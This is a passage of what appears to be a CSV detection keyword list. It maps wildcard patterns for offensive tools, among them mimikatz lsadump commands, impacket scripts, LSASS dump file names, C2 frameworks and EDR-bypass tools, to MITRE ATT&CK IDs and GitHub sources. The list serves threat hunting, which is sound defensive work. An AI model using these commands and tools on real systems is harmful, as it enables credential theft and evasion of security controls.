Evasion,https://github.com/Flangvik/NetLoader,1,1,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*Londor.exe -t Coverage*,offensive_tool_keyword,Sharp-Suite,C# offensive tools,T1027 - T1059.001 - T1562.001 - T1136.001,TA0004 - TA0005 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*Londor.exe -t Script*,offensive_tool_keyword,Sharp-Suite,C# offensive tools,T1027 - T1059.001 - T1562.001 - T1136.001,TA0004 - TA0005 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*looCiprian/GC2-sheet*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*lookupsid.py -hashes :* *@* 0*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*lookupsid.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*loot_memory.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*LordNoteworthy*,offensive_tool_keyword,Github Username,Github username of hacker known for malware pocs and windows exploitations,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/LordNoteworthy,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*lotus2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Lovely-Potato*,offensive_tool_keyword,Lovely-Potato,Lovely Potato (automating juicy potato) Powershell wrapper of Decoders JuicyPotato for easy exploitation. This entirely depends on the original Juicy Potato binary and utilizes his test_clsid.bat. another Local Privilege Escalation tool. 
from a Windows Service Accounts to NT AUTHORITY\SYSTEM,T1055 - T1547.002 - T1543.003 - T1059.001,TA0004 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/TsukiCTF/Lovely-Potato,1,0,N/A,N/A,2,131,29,2021-07-21T18:09:14Z,2019-05-17T19:37:20Z -*lsa_decryptor.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*lsa_decryptor_nt*.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*lsa_secrets.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*lsadump.exe*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*lsadump::*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::backupkeys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::cache*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::changentlm*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::dcshadow*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::dcsync*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::lsa*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::mbc*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::netsync*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::packages*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::postzerologon*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::RpData*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::sam*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::secrets*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::setntlm*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::trust*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::zerologon*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsarpc_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*LSASecretDefaultPassword*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*lsasecrets.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*lsass comsvcs*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*lsass direct*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Lsass Dump File Created*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,0,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*lsass dump from agent*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*LSASS dump might fail if RunAsPPL is enabled*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*lsass.dmp*,offensive_tool_keyword,AD exploitation cheat sheet,Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*lsass.dmp*,offensive_tool_keyword,lsass,Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly,T1110,N/A,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*lsass.dmp*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 
- TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*lsass.exe*.dmp*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,0,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*lsass.exe*C:\temp\tmp.tmp*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*lsass_*.dmp*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*lsass_dump_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*lsass_dump_lsassy_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*lsassdump.dmp*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*LsassDump_20*.ps1*,offensive_tool_keyword,PSSW100AVB,This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/tihanyin/PSSW100AVB,1,1,N/A,N/A,10,983,166,2022-06-18T16:52:38Z,2021-10-08T17:36:24Z -*lsassdumps*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Lsass-Mdump*,signature_keyword,Antivirus Signature,Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly,T1110,TA0006,N/A,N/A,Credential Access,lsass dump malware signature,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*LSASSProtectionBypass*/,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*LsassSilentProcessExit.cpp*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z 
